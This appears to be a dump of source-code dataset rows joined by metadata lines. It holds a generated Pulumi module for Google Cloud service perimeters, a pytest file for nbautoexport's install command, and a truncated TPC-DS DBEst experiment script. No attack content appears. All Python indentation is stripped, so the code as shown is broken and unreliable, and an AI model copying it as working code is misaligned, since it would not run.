# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ServicePerimetersArgs', 'ServicePerimeters']
@pulumi.input_type
class ServicePerimetersArgs:
def __init__(__self__, *,
parent: pulumi.Input[str],
service_perimeters: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]]] = None):
"""
The set of arguments for constructing a ServicePerimeters resource.
:param pulumi.Input[str] parent: The AccessPolicy this ServicePerimeter lives in.
Format: accessPolicies/{policy_id}
:param pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]] service_perimeters: The desired Service Perimeters that should replace all existing Service Perimeters in the Access Policy.
Structure is documented below.
"""
pulumi.set(__self__, "parent", parent)
if service_perimeters is not None:
pulumi.set(__self__, "service_perimeters", service_perimeters)
@property
@pulumi.getter
def parent(self) -> pulumi.Input[str]:
"""
The AccessPolicy this ServicePerimeter lives in.
Format: accessPolicies/{policy_id}
"""
return pulumi.get(self, "parent")
@parent.setter
def parent(self, value: pulumi.Input[str]):
pulumi.set(self, "parent", value)
@property
@pulumi.getter(name="servicePerimeters")
def service_perimeters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]]]:
"""
The desired Service Perimeters that should replace all existing Service Perimeters in the Access Policy.
Structure is documented below.
"""
return pulumi.get(self, "service_perimeters")
@service_perimeters.setter
def service_perimeters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]]]):
pulumi.set(self, "service_perimeters", value)
@pulumi.input_type
class _ServicePerimetersState:
def __init__(__self__, *,
parent: Optional[pulumi.Input[str]] = None,
service_perimeters: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]]] = None):
"""
Input properties used for looking up and filtering ServicePerimeters resources.
:param pulumi.Input[str] parent: The AccessPolicy this ServicePerimeter lives in.
Format: accessPolicies/{policy_id}
:param pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]] service_perimeters: The desired Service Perimeters that should replace all existing Service Perimeters in the Access Policy.
Structure is documented below.
"""
if parent is not None:
pulumi.set(__self__, "parent", parent)
if service_perimeters is not None:
pulumi.set(__self__, "service_perimeters", service_perimeters)
@property
@pulumi.getter
def parent(self) -> Optional[pulumi.Input[str]]:
"""
The AccessPolicy this ServicePerimeter lives in.
Format: accessPolicies/{policy_id}
"""
return pulumi.get(self, "parent")
@parent.setter
def parent(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "parent", value)
@property
@pulumi.getter(name="servicePerimeters")
def service_perimeters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]]]:
"""
The desired Service Perimeters that should replace all existing Service Perimeters in the Access Policy.
Structure is documented below.
"""
return pulumi.get(self, "service_perimeters")
@service_perimeters.setter
def service_perimeters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]]]):
pulumi.set(self, "service_perimeters", value)
class ServicePerimeters(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
parent: Optional[pulumi.Input[str]] = None,
service_perimeters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePerimetersServicePerimeterArgs']]]]] = None,
__props__=None):
"""
Replace all existing Service Perimeters in an Access Policy with the Service Perimeters provided. This is done atomically.
This is a bulk edit of all Service Perimeters and may override existing Service Perimeters created by `accesscontextmanager.ServicePerimeter`,
thus causing a permadiff if used alongside `accesscontextmanager.ServicePerimeter` on the same parent.
To get more information about ServicePerimeters, see:
* [API documentation](https://cloud.google.com/access-context-manager/docs/reference/rest/v1/accessPolicies.servicePerimeters)
* How-to Guides
* [Service Perimeter Quickstart](https://cloud.google.com/vpc-service-controls/docs/quickstart)
## Example Usage
### Access Context Manager Service Perimeters Basic
```python
import pulumi
import pulumi_gcp as gcp
access_policy = gcp.accesscontextmanager.AccessPolicy("access-policy",
parent="organizations/123456789",
title="my policy")
service_perimeter = gcp.accesscontextmanager.ServicePerimeters("service-perimeter",
parent=access_policy.name.apply(lambda name: f"accessPolicies/{name}"),
service_perimeters=[
gcp.accesscontextmanager.ServicePerimetersServicePerimeterArgs(
name=access_policy.name.apply(lambda name: f"accessPolicies/{name}/servicePerimeters/"),
status=gcp.accesscontextmanager.ServicePerimetersServicePerimeterStatusArgs(
restricted_services=["storage.googleapis.com"],
),
title="",
),
gcp.accesscontextmanager.ServicePerimetersServicePerimeterArgs(
name=access_policy.name.apply(lambda name: f"accessPolicies/{name}/servicePerimeters/"),
status=gcp.accesscontextmanager.ServicePerimetersServicePerimeterStatusArgs(
restricted_services=["bigtable.googleapis.com"],
),
title="",
),
])
access_level = gcp.accesscontextmanager.AccessLevel("access-level",
basic=gcp.accesscontextmanager.AccessLevelBasicArgs(
conditions=[gcp.accesscontextmanager.AccessLevelBasicConditionArgs(
device_policy=gcp.accesscontextmanager.AccessLevelBasicConditionDevicePolicyArgs(
os_constraints=[gcp.accesscontextmanager.AccessLevelBasicConditionDevicePolicyOsConstraintArgs(
os_type="DESKTOP_CHROME_OS",
)],
require_screen_lock=False,
),
regions=[
"CH",
"IT",
"US",
],
)],
),
parent=access_policy.name.apply(lambda name: f"accessPolicies/{name}"),
title="chromeos_no_lock")
```
## Import
        ServicePerimeters can be imported using any of these accepted formats:
```sh
$ pulumi import gcp:accesscontextmanager/servicePerimeters:ServicePerimeters default {{parent}}/servicePerimeters
```
```sh
$ pulumi import gcp:accesscontextmanager/servicePerimeters:ServicePerimeters default {{parent}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] parent: The AccessPolicy this ServicePerimeter lives in.
Format: accessPolicies/{policy_id}
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePerimetersServicePerimeterArgs']]]] service_perimeters: The desired Service Perimeters that should replace all existing Service Perimeters in the Access Policy.
Structure is documented below.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ServicePerimetersArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Replace all existing Service Perimeters in an Access Policy with the Service Perimeters provided. This is done atomically.
This is a bulk edit of all Service Perimeters and may override existing Service Perimeters created by `accesscontextmanager.ServicePerimeter`,
thus causing a permadiff if used alongside `accesscontextmanager.ServicePerimeter` on the same parent.
To get more information about ServicePerimeters, see:
* [API documentation](https://cloud.google.com/access-context-manager/docs/reference/rest/v1/accessPolicies.servicePerimeters)
* How-to Guides
* [Service Perimeter Quickstart](https://cloud.google.com/vpc-service-controls/docs/quickstart)
## Example Usage
### Access Context Manager Service Perimeters Basic
```python
import pulumi
import pulumi_gcp as gcp
access_policy = gcp.accesscontextmanager.AccessPolicy("access-policy",
parent="organizations/123456789",
title="my policy")
service_perimeter = gcp.accesscontextmanager.ServicePerimeters("service-perimeter",
parent=access_policy.name.apply(lambda name: f"accessPolicies/{name}"),
service_perimeters=[
gcp.accesscontextmanager.ServicePerimetersServicePerimeterArgs(
name=access_policy.name.apply(lambda name: f"accessPolicies/{name}/servicePerimeters/"),
status=gcp.accesscontextmanager.ServicePerimetersServicePerimeterStatusArgs(
restricted_services=["storage.googleapis.com"],
),
title="",
),
gcp.accesscontextmanager.ServicePerimetersServicePerimeterArgs(
name=access_policy.name.apply(lambda name: f"accessPolicies/{name}/servicePerimeters/"),
status=gcp.accesscontextmanager.ServicePerimetersServicePerimeterStatusArgs(
restricted_services=["bigtable.googleapis.com"],
),
title="",
),
])
access_level = gcp.accesscontextmanager.AccessLevel("access-level",
basic=gcp.accesscontextmanager.AccessLevelBasicArgs(
conditions=[gcp.accesscontextmanager.AccessLevelBasicConditionArgs(
device_policy=gcp.accesscontextmanager.AccessLevelBasicConditionDevicePolicyArgs(
os_constraints=[gcp.accesscontextmanager.AccessLevelBasicConditionDevicePolicyOsConstraintArgs(
os_type="DESKTOP_CHROME_OS",
)],
require_screen_lock=False,
),
regions=[
"CH",
"IT",
"US",
],
)],
),
parent=access_policy.name.apply(lambda name: f"accessPolicies/{name}"),
title="chromeos_no_lock")
```
## Import
        ServicePerimeters can be imported using any of these accepted formats:
```sh
$ pulumi import gcp:accesscontextmanager/servicePerimeters:ServicePerimeters default {{parent}}/servicePerimeters
```
```sh
$ pulumi import gcp:accesscontextmanager/servicePerimeters:ServicePerimeters default {{parent}}
```
:param str resource_name: The name of the resource.
:param ServicePerimetersArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ServicePerimetersArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
parent: Optional[pulumi.Input[str]] = None,
service_perimeters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePerimetersServicePerimeterArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ServicePerimetersArgs.__new__(ServicePerimetersArgs)
if parent is None and not opts.urn:
raise TypeError("Missing required property 'parent'")
__props__.__dict__["parent"] = parent
__props__.__dict__["service_perimeters"] = service_perimeters
super(ServicePerimeters, __self__).__init__(
'gcp:accesscontextmanager/servicePerimeters:ServicePerimeters',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
parent: Optional[pulumi.Input[str]] = None,
service_perimeters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePerimetersServicePerimeterArgs']]]]] = None) -> 'ServicePerimeters':
"""
Get an existing ServicePerimeters resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] parent: The AccessPolicy this ServicePerimeter lives in.
Format: accessPolicies/{policy_id}
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePerimetersServicePerimeterArgs']]]] service_perimeters: The desired Service Perimeters that should replace all existing Service Perimeters in the Access Policy.
Structure is documented below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServicePerimetersState.__new__(_ServicePerimetersState)
__props__.__dict__["parent"] = parent
__props__.__dict__["service_perimeters"] = service_perimeters
return ServicePerimeters(resource_name, opts=opts, __props__=__props__)
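    # Hedged usage sketch: re-attach to an already-provisioned resource by its
    # provider ID, mirroring the import formats documented above:
    #
    #     existing = ServicePerimeters.get(
    #         "existing", id="{{parent}}/servicePerimeters")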
@property
@pulumi.getter
def parent(self) -> pulumi.Output[str]:
"""
The AccessPolicy this ServicePerimeter lives in.
Format: accessPolicies/{policy_id}
"""
return pulumi.get(self, "parent")
@property
@pulumi.getter(name="servicePerimeters")
def service_perimeters(self) -> pulumi.Output[Optional[Sequence['outputs.ServicePerimetersServicePerimeter']]]:
"""
The desired Service Perimeters that should replace all existing Service Perimeters in the Access Policy.
Structure is documented below.
"""
return pulumi.get(self, "service_perimeters")
| 47.936782 | 235 | 0.654058 | 1,531 | 16,682 | 6.949053 | 0.150229 | 0.09108 | 0.019739 | 0.030548 | 0.820848 | 0.807031 | 0.806185 | 0.795094 | 0.7903 | 0.78419 | 0 | 0.001702 | 0.260221 | 16,682 | 347 | 236 | 48.074928 | 0.860384 | 0.54364 | 0 | 0.559322 | 1 | 0 | 0.153634 | 0.073816 | 0 | 0 | 0 | 0 | 0 | 1 | 0.144068 | false | 0.008475 | 0.059322 | 0 | 0.288136 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4a837390ce0ca5bc474bb50477fbcfd22817d7a5 | 2,191 | py | Python | tests/test_cli_install.py | drivendataorg/nbautoexport | 3a3d67ac392d22bd2284ccce98f70ca76fd01637 | ["MIT"] | 46 | 2020-07-25T22:59:56.000Z | 2022-03-11T00:06:30.000Z | tests/test_cli_install.py | drivendataorg/nbautoexport | 3a3d67ac392d22bd2284ccce98f70ca76fd01637 | ["MIT"] | 67 | 2020-07-01T18:55:20.000Z | 2022-03-16T20:20:27.000Z | tests/test_cli_install.py | drivendataorg/nbautoexport | 3a3d67ac392d22bd2284ccce98f70ca76fd01637 | ["MIT"] | 7 | 2020-07-21T05:36:21.000Z | 2021-10-03T21:02:33.000Z |
from typer.testing import CliRunner
from nbautoexport.nbautoexport import app
from nbautoexport import jupyter_config
def test_install_new_config(tmp_path, monkeypatch):
monkeypatch.setenv("JUPYTER_CONFIG_DIR", str(tmp_path))
config_path = tmp_path / "jupyter_notebook_config.py"
result = CliRunner().invoke(app, ["install"])
assert result.exit_code == 0
assert config_path.exists()
with config_path.open("r", encoding="utf-8") as fp:
config = fp.read()
assert config == jupyter_config.post_save_hook_initialize_block
def test_install_existing_config(tmp_path, monkeypatch):
monkeypatch.setenv("JUPYTER_CONFIG_DIR", str(tmp_path))
config_path = tmp_path / "jupyter_notebook_config.py"
with config_path.open("w", encoding="utf-8") as fp:
fp.write("print('hello world!')")
assert config_path.exists()
result = CliRunner().invoke(app, ["install"])
assert result.exit_code == 0
assert config_path.exists()
with config_path.open("r", encoding="utf-8") as fp:
config = fp.read()
assert config == (
"print('hello world!')" + "\n" + jupyter_config.post_save_hook_initialize_block
)
def test_install_new_config_with_path(tmp_path):
config_path = tmp_path / "nonstandard_config.py"
result = CliRunner().invoke(app, ["install", "--jupyter-config", str(config_path)])
assert result.exit_code == 0
assert config_path.exists()
with config_path.open("r", encoding="utf-8") as fp:
config = fp.read()
assert config == jupyter_config.post_save_hook_initialize_block
def test_install_existing_config_with_path(tmp_path):
config_path = tmp_path / "nonstandard_config.py"
with config_path.open("w", encoding="utf-8") as fp:
fp.write("print('hello world!')")
assert config_path.exists()
result = CliRunner().invoke(app, ["install", "--jupyter-config", str(config_path)])
assert result.exit_code == 0
assert config_path.exists()
with config_path.open("r", encoding="utf-8") as fp:
config = fp.read()
assert config == (
"print('hello world!')" + "\n" + jupyter_config.post_save_hook_initialize_block
)
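# These tests rely on pytest's tmp_path and monkeypatch fixtures; a typical
# invocation (assuming pytest is installed) is:
#
#     pytest tests/test_cli_install.py -q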
| 31.753623 | 87 | 0.69466 | 295 | 2,191 | 4.891525 | 0.169492 | 0.12474 | 0.045738 | 0.091476 | 0.928621 | 0.914761 | 0.914761 | 0.914761 | 0.914761 | 0.914761 | 0 | 0.005531 | 0.174806 | 2,191 | 68 | 88 | 32.220588 | 0.792589 | 0 | 0 | 0.808511 | 0 | 0 | 0.143314 | 0.042903 | 0 | 0 | 0 | 0 | 0.297872 | 1 | 0.085106 | false | 0 | 0.06383 | 0 | 0.148936 | 0.085106 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4abaeb27a368ef505c2af8ba0f4e1b60813635b4 | 38,284 | py | Python | experiments/tpcds1d.py | qingzma/DBEstClient | d2cdf51bc3c69e50bcf4d1d516673b7d20843c16 | ["BSD-2-Clause"] | 11 | 2019-12-24T02:39:35.000Z | 2022-03-21T22:39:41.000Z | experiments/tpcds1d.py | Forever-MrX/DBEstClient | d2cdf51bc3c69e50bcf4d1d516673b7d20843c16 | ["BSD-2-Clause"] | 4 | 2019-12-09T09:48:17.000Z | 2021-07-07T02:58:26.000Z | experiments/tpcds1d.py | qingzma/DBEstClient | d2cdf51bc3c69e50bcf4d1d516673b7d20843c16 | ["BSD-2-Clause"] | 8 | 2019-11-08T02:10:37.000Z | 2022-03-21T22:42:46.000Z |
# Created by Qingzhi Ma at 21/11/2019
# All rights reserved
# Department of Computer Science
# the University of Warwick
# Q.Ma.2@warwick.ac.uk
from dbestclient.executor.executor import SqlExecutor
def run():
#
sqlExecutor = SqlExecutor()
sqlExecutor.set_table_headers("ss_sold_date_sk,ss_sold_time_sk,ss_item_sk,ss_customer_sk,ss_cdemo_sk,ss_hdemo_sk," +
"ss_addr_sk,ss_store_sk,ss_promo_sk,ss_ticket_number,ss_quantity,ss_wholesale_cost," +
"ss_list_price,ss_sales_price,ss_ext_discount_amt,ss_ext_sales_price," +
"ss_ext_wholesale_cost,ss_ext_list_price,ss_ext_tax,ss_coupon_amt,ss_net_paid," +
"ss_net_paid_inc_tax,ss_net_profit,none")
# build_models(sqlExecutor)
run_10k(sqlExecutor)
run_100k(sqlExecutor)
# sqlExecutor.execute(
# "create table tpcds40g_storesales_10k_ss_quantity_ss_sales_price(ss_quantity real, ss_sales_price real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
# sqlExecutor.execute("select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_sales_price_ where ss_sales_price between 50.00 and 100.00")
# sqlExecutor.execute("select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_sales_price_ where ss_sales_price between 100.00 and 150.00")
# sqlExecutor.execute("select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_sales_price_ where ss_sales_price between 150.00 and 200.00")
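# Model naming convention used below: tpcds40g_<table>_<sampleSize>_<xCol>_<yCol>,
# each trained on a uniform sample drawn from the 40 GB TPC-DS .dat files.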
def build_models(sqlExecutor):
# 10k
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_quantity_ss_sales_price(ss_quantity real, ss_sales_price real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_quantity_ss_net_profit(ss_quantity real, ss_net_profit real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_list_price_ss_quantity(ss_list_price real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_list_price_ss_list_price(ss_list_price real, ss_list_price real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt(ss_list_price real, ss_coupon_amt real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost(ss_list_price real, ss_wholesale_cost real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_ext_discount_amt_ss_quantity(ss_ext_discount_amt real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_ext_sales_price_ss_quantity(ss_ext_sales_price real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_ext_list_price_ss_quantity(ss_ext_list_price real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_ext_tax_ss_quantity(ss_ext_tax real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_net_paid_ss_quantity(ss_net_paid real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_net_paid_inc_tax_ss_quantity(ss_net_paid_inc_tax real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_net_profit_ss_quantity(ss_net_profit real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.set_table_headers(
"ws_sold_date_sk,ws_sold_time_sk,ws_ship_date_sk,ws_item_sk,ws_bill_customer_sk,ws_bill_cdemo_sk," +
"ws_bill_hdemo_sk,ws_bill_addr_sk,ws_ship_customer_sk,ws_ship_cdemo_sk,ws_ship_hdemo_sk,ws_ship_addr_sk," +
"ws_web_page_sk,ws_web_site_sk,ws_ship_mode_sk,ws_warehouse_sk,ws_promo_sk,ws_order_number,ws_quantity," +
"ws_wholesale_cost,ws_list_price,ws_sales_price,ws_ext_discount_amt,ws_ext_sales_price,ws_ext_wholesale_cost," +
"ws_ext_list_price,ws_ext_tax,ws_coupon_amt,ws_ext_ship_cost,ws_net_paid,ws_net_paid_inc_tax," +
"ws_net_paid_inc_ship,ws_net_paid_inc_ship_tax,ws_net_profit")
sqlExecutor.execute(
"create table tpcds40g_websales_10k_ws_quantity_ws_sales_price(ws_quantity real, ws_sales_price real) from '/data/tpcds/40G/web_sales.dat' method uniform size 10000")
# 100k
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_quantity_ss_sales_price(ss_quantity real, ss_sales_price real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_quantity_ss_net_profit(ss_quantity real, ss_net_profit real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_list_price_ss_quantity(ss_list_price real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_list_price_ss_list_price(ss_list_price real, ss_list_price real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt(ss_list_price real, ss_coupon_amt real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost(ss_list_price real, ss_wholesale_cost real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_ext_discount_amt_ss_quantity(ss_ext_discount_amt real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_ext_sales_price_ss_quantity(ss_ext_sales_price real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_ext_list_price_ss_quantity(ss_ext_list_price real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_ext_tax_ss_quantity(ss_ext_tax real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_net_paid_ss_quantity(ss_net_paid real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_net_paid_inc_tax_ss_quantity(ss_net_paid_inc_tax real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_net_profit_ss_quantity(ss_net_profit real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.set_table_headers(
"ws_sold_date_sk,ws_sold_time_sk,ws_ship_date_sk,ws_item_sk,ws_bill_customer_sk,ws_bill_cdemo_sk," +
"ws_bill_hdemo_sk,ws_bill_addr_sk,ws_ship_customer_sk,ws_ship_cdemo_sk,ws_ship_hdemo_sk,ws_ship_addr_sk," +
"ws_web_page_sk,ws_web_site_sk,ws_ship_mode_sk,ws_warehouse_sk,ws_promo_sk,ws_order_number,ws_quantity," +
"ws_wholesale_cost,ws_list_price,ws_sales_price,ws_ext_discount_amt,ws_ext_sales_price,ws_ext_wholesale_cost," +
"ws_ext_list_price,ws_ext_tax,ws_coupon_amt,ws_ext_ship_cost,ws_net_paid,ws_net_paid_inc_tax," +
"ws_net_paid_inc_ship,ws_net_paid_inc_ship_tax,ws_net_profit")
sqlExecutor.execute(
"create table tpcds40g_websales_100k_ws_quantity_ws_sales_price(ws_quantity real, ws_sales_price real) from '/data/tpcds/40G/web_sales.dat' method uniform size 100000")
def run_10k(sqlExecutor):
sums = [
"select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_sales_price where ss_sales_price between 50.00 and 100.00",
"select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_sales_price where ss_sales_price between 100.00 and 150.00",
"select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_sales_price where ss_sales_price between 150.00 and 200.00",
"select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_net_profit where ss_net_profit between 0 and 2000",
"select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_net_profit where ss_net_profit between 150 and 3000",
"select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_net_profit where ss_net_profit between 50 and 25000", ]
    counts = [
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 1 and 20",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 21 and 40",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 41 and 60",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 61 and 80",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 81 and 100",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 0 and 5",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 6 and 10",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 11 and 15",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 16 and 20",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 21 and 25",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 26 and 30",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 90 and 100",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 70 and 80",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 80 and 90",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 100 and 110",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 110 and 120",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 120 and 130",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 7000 and 8000",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 8000 and 9000",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 9000 and 10000",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 10000 and 11000",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 11000 and 12000",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 12000 and 13000",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 10 and 30",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 20 and 40",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 30 and 50",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 40 and 60",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 50 and 70",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 60 and 80",
    ]
    avgs = [
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_10k_ss_ext_discount_amt_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_10k_ss_ext_discount_amt_ss_quantity where ss_quantity between 21 and 40",
